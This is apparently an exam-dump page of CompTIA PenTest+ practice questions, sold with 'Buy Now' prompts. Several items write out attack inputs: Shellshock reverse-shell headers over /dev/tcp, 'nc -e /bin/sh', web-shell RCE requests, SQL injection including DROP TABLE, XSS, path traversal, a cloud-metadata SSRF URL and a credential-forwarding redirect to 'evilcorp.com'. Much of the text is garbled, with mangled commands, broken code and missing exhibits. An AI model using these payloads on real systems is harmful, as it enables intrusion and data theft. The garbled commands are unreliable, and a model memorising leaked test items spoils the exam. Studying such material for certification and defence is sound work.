Summer Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtreat

PT0-002 CompTIA PenTest+ Certification Exam Questions and Answers

Questions 4

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

Options:

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Buy Now
Questions 5

During a security assessment, a penetration tester decides to write the following Python script: import requests

x= ['OPTIONS', 'TRACE', 'TEST'l

for y in x;

z - requests.request(y, 'http://server.net ')

print(y, z.status_code, z.reason)

Which of the following is the penetration tester trying to accomplish? (Select two).

Options:

A.

Web server denial of service

B.

HTTP methods availability

C.

'Web application firewall detection

D.

'Web server fingerprinting

E.

Web server error handling

F.

Web server banner grabbing

Buy Now
Questions 6

During a test of a custom-built web application, a penetration tester identifies several vulnerabilities. Which of the following would be the most interested in the steps to reproduce these vulnerabilities?

Options:

A.

Operations staff

B.

Developers

C.

Third-party stakeholders

D.

C-suite executives

Buy Now
Questions 7

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

Options:

A.

python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php ', data={'cmd=id'}))"

B.

python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php ', data=

('cmd':'id') ) .text) "

C.

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

{'cmd':'id'}) )"

D.

python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php ', params=

('cmd':'id'}) .text) "

Buy Now
Questions 8

A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?

Options:

A.

Determine if the tester was proficient.

B.

Test a new non-public-facing server for vulnerabilities.

C.

Determine if the initial report is complete.

D.

Test the efficacy of the remediation effort.

Buy Now
Questions 9

A penetration tester wrote the following script on a compromised system:

#!/bin/bash

network='10.100.100'

ports='22 23 80 443'

for x in {1 .. 254};

do (nc -zv $network.$x $ports );

done

Which of the following would explain using this script instead of another tool?

Options:

A.

The typical tools could not be used against Windows systems.

B.

The configuration required the penetration tester to not utilize additional files.

C.

The Bash script will provide more thorough output.

D.

The penetration tester wanted to persist this script to run on reboot.

Buy Now
Questions 10

A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode

Which of the following is the most likely reason the penetration tester ran this command?

Options:

A.

To search for passwords in the service directory

B.

To list scheduled tasks that may be exploitable

C.

To register a service to run as System

D.

To find services that have unquoted service paths

Buy Now
Questions 11

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?

Options:

A.

Executive summary

B.

Vulnerability severity rating

C.

Recommendations of mitigation

D.

Methodology

Buy Now
Questions 12

Which of the following should be included in scope documentation?

Options:

A.

Service accounts

B.

Tester experience

C.

Disclaimer

D.

Number of tests

Buy Now
Questions 13

Which of the following tools would be best to use to conceal data in various kinds of image files?

Options:

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Buy Now
Questions 14

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAIT FOR DELAY '0:0:15'

Which of the following actions would best mitigate this type ol attack?

Options:

A.

Encrypting passwords

B.

Parameterizing queries

C.

Encoding output

D.

Sanitizing HTML

Buy Now
Questions 15

A penetration tester is reviewing the logs of a proxy server and discovers the following URLs:

https://test.comptia.com/profile.php?userid=1546

https://test.cpmptia.com/profile.php?userid=5482

https://test.comptia.com/profile.php?userid=3618

Which of the following types of vulnerabilities should be remediated?

Options:

A.

Insecure direct object reference

B.

Improper error handling

C.

Race condition

D.

Weak or default configurations

Buy Now
Questions 16

During an assessment, a penetration tester discovers the following code sample in a web application:

"(&(userid=*)(userid=*))(I(userid=*)(userPwd=(SHAl}a9993e364706816aba3e25717850c26c9cd0d89d==))

Which of the following injections is being performed?

Options:

A.

Boolean SQL

B.

Command

C.

Blind SQL

D.

LDAP

Buy Now
Questions 17

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"

When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

Options:

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Buy Now
Questions 18

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

Options:

A.

Bluejacking

B.

Bluesnarfing

C.

BLE attack

D.

WPS PIN attack

Buy Now
Questions 19

Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?

Options:

A.

DirBuster

B.

Open VAS

C.

Scout Suite

D.

CeWL

Buy Now
Questions 20

A penetration tester is reviewing the security of a web application running in an laaS compute instance. Which of the following payloads should the tester send to get the running process credentials?

Options:

A.

file=http://192.168. 1. 78?+document.cookie

B.

file =.. / .. / .. /proc/self/environ

C.

file='%20or%2054365=54365 ;--

D.

file=http://169.254.169.254/latest/meta-data/

Buy Now
Questions 21

A penetration tester is performing an assessment for an organization and must gather valid user credentials. Which of the following attacks would be best for the tester to use to achieve this objective?

Options:

A.

Wardriving

B.

Captive portal

C.

Deauthentication

D.

Impersonation

Buy Now
Questions 22

A penetration tester is conducting an assessment of an organization that has both a web and mobile application. While testing the user profile page, the penetration tester notices that additional data is returned in the API response, which is not displayed in the web user interface. Which of the following is the most effective technique to extract sensitive user data?

Options:

A.

Compare PI I from data leaks to publicly exposed user profiles.

B.

Target the user profile page with a denial-of-service attack.

C.

Target the user profile page with a reflected XSS attack.

D.

Compare the API response fields to GUI fields looking for PH.

Buy Now
Questions 23

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

Options:

A.

nmap -sU -p 1-1024 10.0.0.15

B.

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.

nmap -T5 -p 1-65535 -A 10.0.0.15

D.

nmap -T3 -F 10.0.0.15

Buy Now
Questions 24

A penetration tester is working to enumerate the PLC devices on the 10.88.88.76/24 network. Which of the following commands should the tester use to achieve the objective in a way that minimizes the risk of affecting the PLCs?

Options:

A.

nmap —script=s7-info -p 102 10.88.88.76/24 -T3

B.

nmap —script=wsdd-discover -p 3702 -sUlO.88.88.76/24

C.

nmap --script=iax2-version -p 4569 -sU -V 10.88.88.76/24 -T2

D.

nmap --script=xll-access -p 6000-6009 10.88.88.76/24

Buy Now
Questions 25

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

Which of the following commands should the engineer use to achieve the objective in the least amount of time?

Options:

A.

nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100

B.

nmap -TO -p 80 10.0.0.0/16

C.

nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60

D.

nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80

Buy Now
Questions 26

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate

background checks:

Which of the following candidates should most likely be excluded from consideration?

Options:

A.

Candidate 1

B.

Candidate 2

C.

Candidate 3

D.

Candidate 4

Buy Now
Questions 27

In Java and C/C++, variable initialization is critical because:

Options:

A.

the unknown value, when used later, will cause unexpected behavior.

B.

the compiler will assign null to the variable, which will cause warnings and errors.

C.

the initial state of the variable creates a race condition.

D.

the variable will not have an object type assigned to it.

Buy Now
Questions 28

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal

Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

Options:

A.

nc 10.10.1.2

B.

ssh 10.10.1.2

C.

nc 127.0.0.1 5555

D.

ssh 127.0.0.1 5555

Buy Now
Questions 29

Which of the following would be the most efficient way to write a Python script that interacts with a web application?

Options:

A.

Create a class for requests.

B.

Write a function for requests.

C.

Import the requests library.

D.

Use the cURL OS command.

Buy Now
Questions 30

Which of the following assessment methods is the most likely to cause harm to an ICS environment?

Options:

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Buy Now
Questions 31

Which of the following documents would be the most helpful in determining who is at fault for a temporary outage that occurred during a penetration test?

Options:

A.

Non-disclosure agreement

B.

Business associate agreement

C.

Assessment scope and methodologies

D.

Executive summary

Buy Now
Questions 32

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

Options:

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Buy Now
Questions 33

A penetration tester is enumerating shares and receives the following output:

Which of the following should the penetration tester enumerate next?

Options:

A.

dev

B.

print$

C.

home

D.

notes

Buy Now
Questions 34

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Options:

Buy Now
Questions 35

During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:

nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191

The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?

Options:

A.

All of the ports in the target range are closed.

B.

Nmap needs more time to scan the ports in the target range.

C.

The ports in the target range cannot be scanned because they are common UDP ports.

D.

All of the ports in the target range are open.

Buy Now
Questions 36

A penetration tester is preparing a credential stuffing attack against a company's website. Which of the following can be used to passively get the most relevant information?

Options:

A.

Shodan

B.

BeEF

C.

HavelBeenPwned

D.

Maltego

Buy Now
Questions 37

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

/home/user/scripts

Which of the following commands should the penetration tester use to perform this scan?

Options:

A.

nmap resume "not intrusive"

B.

nmap script default safe

C.

nmap script /home/user/scripts

D.

nmap -load /home/user/scripts

Buy Now
Questions 38

An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems. Which of the following documents addresses this requirement?

Options:

A.

ROE

B.

NDA

C.

MOU

D.

SLA

Buy Now
Questions 39

During a security assessment, a penetration tester decides to implement a simple TCP port scanner to check the open ports from 1000 to 2000. Which of the following Python scripts would achieve this task?

Options:

A.

fori in range(1000, 2001): s = socket(AF_INET, SOCK_STREAM)

conn = s.connect_ex((host_IP, i))

if (conn == 0):

print(fPort {i} OPEN’)

B.

close ()

C.

fori in range(1001, 2000): s = socket(AF_INET, SOCK_STREAM) conn = s.connect—ex((host_IP, i)) if (conn == 0): print (f'Port {i} OPEN’) s.close ()

D.

fori in range(1000, 2001): s = socket(AF—INET, SOCK_DGRAM) conn = s.connect—ex((host_IP, i)) if (conn == 0): print(f’Port {i} OPEN’) s.close ()

E.

fori in range (1000, 2000): s = socket(SOCK_STREAM, AF_INET) conn = s.connect—ex((host—IP, i)) if (conn == 0): print (f'Port {i} OPEN') s.close()

Buy Now
Questions 40

An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago. Which of the following post-report delivery activities would have most likely prevented this scenario?

Options:

A.

Client acceptance

B.

Data destruction process

C.

Attestation of findings

D.

Lessons learned

Buy Now
Questions 41

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Buy Now
Questions 42

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

Options:

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Buy Now
Questions 43

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Options:

A.

Nessus

B.

ProxyChains

C.

OWASPZAP

D.

Empire

Buy Now
Questions 44

A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Options:

A.

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

B.

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the

engagement

C.

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

D.

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

E.

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

F.

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

Buy Now
Questions 45

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Options:

A.

Utilize the tunnel as a means of pivoting to other internal devices.

B.

Disregard the IP range, as it is out of scope.

C.

Stop the assessment and inform the emergency contact.

D.

Scan the IP range for additional systems to exploit.

Buy Now
Questions 46

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

Options:

A.

Open-source research

B.

A ping sweep

C.

Traffic sniffing

D.

Port knocking

E.

A vulnerability scan

F.

An Nmap scan

Buy Now
Questions 47

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

Options:

A.

DNS cache poisoning

B.

MAC spoofing

C.

ARP poisoning

D.

Double-tagging attack

Buy Now
Questions 48

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

Options:

A.

The HTTP port is not open on the firewall.

B.

The tester did not run sudo before the command.

C.

The web server is using HTTPS instead of HTTP.

D.

This URI returned a server error.

Buy Now
Questions 49

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

Options:

A.

nmap192.168.1.1-5–PU22-25,80

B.

nmap192.168.1.1-5–PA22-25,80

C.

nmap192.168.1.1-5–PS22-25,80

D.

nmap192.168.1.1-5–Ss22-25,80

Buy Now
Questions 50

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

Options:

A.

Manually check the version number of the VoIP service against the CVE release

B.

Test with proof-of-concept code from an exploit database

C.

Review SIP traffic from an on-path position to look for indicators of compromise

D.

Utilize an nmap –sV scan against the service

Buy Now
Questions 51

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

Options:

A.

Hydra

B.

John the Ripper

C.

Cain and Abel

D.

Medusa

Buy Now
Questions 52

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Options:

A.

Website scraping

B.

Website cloning

C.

Domain enumeration

D.

URL enumeration

Buy Now
Questions 53

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

Options:

A.

ROE

B.

SLA

C.

MSA

D.

NDA

Buy Now
Questions 54

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be

valid?

Options:

A.

PLCs will not act upon commands injected over the network.

B.

Supervisors and controllers are on a separate virtual network by default.

C.

Controllers will not validate the origin of commands.

D.

Supervisory systems will detect a malicious injection of code/commands.

Buy Now
Questions 55

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

Options:

A.

Key reinstallation

B.

Deauthentication

C.

Evil twin

D.

Replay

Buy Now
Questions 56

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.

Which of the following can be done with the pcap to gain access to the server?

Options:

A.

Perform vertical privilege escalation.

B.

Replay the captured traffic to the server to recreate the session.

C.

Use John the Ripper to crack the password.

D.

Utilize a pass-the-hash attack.

Buy Now
Questions 57

A penetration tester conducted an assessment on a web server. The logs from this session show the following:

http://www.thecompanydomain.com/servicestatus.php?serviceID=892 &serviceID=892 ‘ ; DROP TABLE SERVICES; --

Which of the following attacks is being attempted?

Options:

A.

Clickjacking

B.

Session hijacking

C.

Parameter pollution

D.

Cookie hijacking

E.

Cross-site scripting

Buy Now
Questions 58

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

Options:

A.

Create a one-shot system service to establish a reverse shell.

B.

Obtain /etc/shadow and brute force the root password.

C.

Run the nc -e /bin/sh <...> command.

D.

Move laterally to create a user account on LDAP

Buy Now
Questions 59

Deconfliction is necessary when the penetration test:

Options:

A.

determines that proprietary information is being stored in cleartext.

B.

occurs during the monthly vulnerability scanning.

C.

uncovers indicators of prior compromise over the course of the assessment.

D.

proceeds in parallel with a criminal digital forensic investigation.

Buy Now
Questions 60

A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

Options:

A.

Look for open ports.

B.

Listen for a reverse shell.

C.

Attempt to flood open ports.

D.

Create an encrypted tunnel.

Buy Now
Questions 61

Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

Options:

A.

To provide feedback on the report structure and recommend improvements

B.

To discuss the findings and dispute any false positives

C.

To determine any processes that failed to meet expectations during the assessment

D.

To ensure the penetration-testing team destroys all company data that was gathered during the test

Buy Now
Questions 62

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

Options:

A.

Wardriving

B.

Shodan

C.

Recon-ng

D.

Aircrack-ng

Buy Now
Questions 63

A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

Options:

A.

Wireshark

B.

Aircrack-ng

C.

Kismet

D.

Wifite

Buy Now
Questions 64

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?

Options:

A.

Terminate the contract.

B.

Update the ROE with new signatures. Most Voted

C.

Scan the 8-bit block to map additional missed hosts.

D.

Continue the assessment.

Buy Now
Questions 65

An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?

Options:

A.

nmap -sA 192.168.0.1/24

B.

nmap -sS 192.168.0.1/24

C.

nmap -oG 192.168.0.1/24

D.

nmap 192.168.0.1/24

Buy Now
Questions 66

A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

Options:

A.

Delete the scheduled batch job.

B.

Close the reverse shell connection.

C.

Downgrade the svsaccount permissions.

D.

Remove the tester-created credentials.

Buy Now
Questions 67

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 68

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

Options:

A.

The CVSS score of the finding

B.

The network location of the vulnerable device

C.

The vulnerability identifier

D.

The client acceptance form

E.

The name of the person who found the flaw

F.

The tool used to find the issue

Buy Now
Questions 69

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

Options:

A.

Multiple handshakes

B.

IP addresses

C.

Encrypted file transfers

D.

User hashes sent over SMB

Buy Now
Questions 70

A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

Options:

A.

nmap –p0 –T0 –sS 192.168.1.10

B.

nmap –sA –sV --host-timeout 60 192.168.1.10

C.

nmap –f --badsum 192.168.1.10

D.

nmap –A –n 192.168.1.10

Buy Now
Questions 71

A compliance-based penetration test is primarily concerned with:

Options:

A.

obtaining Pll from the protected network.

B.

bypassing protection on edge devices.

C.

determining the efficacy of a specific set of security standards.

D.

obtaining specific information from the protected network.

Buy Now
Questions 72

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap –O –A –sS –p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

Options:

A.

A firewall or IPS blocked the scan.

B.

The penetration tester used unsupported flags.

C.

The edge network device was disconnected.

D.

The scan returned ICMP echo replies.

Buy Now
Questions 73

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

Options:

A.

Determine active hosts on the network.

B.

Set the TTL of ping packets for stealth.

C.

Fill the ARP table of the networked devices.

D.

Scan the system on the most used ports.

Buy Now
Questions 74

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

Options:

A.

John the Ripper

B.

Hydra

C.

Mimikatz

D.

Cain and Abel

Buy Now
Questions 75

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe type-casting operations

Buy Now
Questions 76

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Options:

A.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

B.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

C.

exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

D.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Buy Now
Questions 77

Appending string values onto another string is called:

Options:

A.

compilation

B.

connection

C.

concatenation

D.

conjunction

Buy Now
Questions 78

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Options:

A.

Pick a lock.

B.

Disable the cameras remotely.

C.

Impersonate a package delivery worker.

D.

Send a phishing email.

Buy Now
Questions 79

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

Options:

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Buy Now
Questions 80

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

Options:

A.

The penetration tester was testing the wrong assets

B.

The planning process failed to ensure all teams were notified

C.

The client was not ready for the assessment to start

D.

The penetration tester had incorrect contact information

Buy Now
Questions 81

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company’s network. Which of the following accounts should the tester use to return the MOST results?

Options:

A.

Root user

B.

Local administrator

C.

Service

D.

Network administrator

Buy Now
Questions 82

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?

Options:

A.

nmap snn exclude 10.1.1.15 10.1.1.0/24 oA target_txt

B.

nmap גiR10oX out.xml | grep גNmapג | cut d ג"f5 > live-hosts.txt

C.

nmap גPnsV OiL target.txt גA target_text_Service

D.

nmap גsSPn n iL target.txt גA target_txtl

Buy Now
Questions 83

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?

Options:

A.

Redact identifying information and provide a previous customer's documentation.

B.

Allow the client to only view the information while in secure spaces.

C.

Determine which reports are no longer under a period of confidentiality.

D.

Provide raw output from penetration testing tools.

Buy Now
Questions 84

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

Options:

A.

DirBuster

B.

CeWL

C.

w3af

D.

Patator

Buy Now
Questions 85

A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

Options:

A.

Tailgating

B.

Dumpster diving

C.

Shoulder surfing

D.

Badge cloning

Buy Now
Questions 86

A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?

Options:

A.

Prying the lock open on the records room

B.

Climbing in an open window of the adjoining building

C.

Presenting a false employee ID to the night guard

D.

Obstructing the motion sensors in the hallway of the records room

Buy Now
Questions 87

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

Options:

A.

WHOIS domain lookup

B.

Job listing and recruitment ads

C.

SSL certificate information

D.

Public data breach dumps

Buy Now
Questions 88

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

Options:

A.

/var/log/messages

B.

/var/log/last_user

C.

/var/log/user_log

D.

/var/log/lastlog

Buy Now
Questions 89

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

Options:

A.

window.location.= 'https://evilcorp.com '

B.

crossDomain: true

C.

geturlparameter ('username')

D.

redirectUrl = 'https://example.com '

Buy Now
Questions 90

A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Options:

A.

Telnet

B.

HTTP

C.

SMTP

D.

DNS

E.

NTP

F.

SNMP

Buy Now
Questions 91

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

Options:

A.

Scraping social media for personal details

B.

Registering domain names that are similar to the target company's

C.

Identifying technical contacts at the company

D.

Crawling the company's website for company information

Buy Now
Questions 92

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

Options:

A.

A vulnerability scan

B.

A WHOIS lookup

C.

A packet capture

D.

An Nmap scan

Buy Now
Questions 93

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

Options:

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Buy Now
Questions 94

Which of the following OSSTM testing methodologies should be used to test under the worst conditions?

Options:

A.

Tandem

B.

Reversal

C.

Semi-authorized

D.

Known environment

Buy Now
Questions 95

A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

Options:

A.

Decode the authorization header using UTF-8.

B.

Decrypt the authorization header using bcrypt.

C.

Decode the authorization header using Base64.

D.

Decrypt the authorization header using AES.

Buy Now
Questions 96

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

Options:

A.

dig company.com MX

B.

whois company.com

C.

cur1 www.company.com

D.

dig company.com A

Buy Now
Questions 97

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

Options:

A.

Changing to Wi-Fi equipment that supports strong encryption

B.

Using directional antennae

C.

Using WEP encryption

D.

Disabling Wi-Fi

Buy Now
Questions 98

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?

Options:

A.

nmap -iL results 192.168.0.10-100

B.

nmap 192.168.0.10-100 -O > results

C.

nmap -A 192.168.0.10-100 -oX results

D.

nmap 192.168.0.10-100 | grep "results"

Buy Now
Questions 99

Which of the following factors would a penetration tester most likely consider when testing at a location?

Options:

A.

Determine if visas are required.

B.

Ensure all testers can access all sites.

C.

Verify the tools being used are legal for use at all sites.

D.

Establish the time of the day when a test can occur.

Buy Now
Questions 100

A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

Options:

A.

Dumpster diving

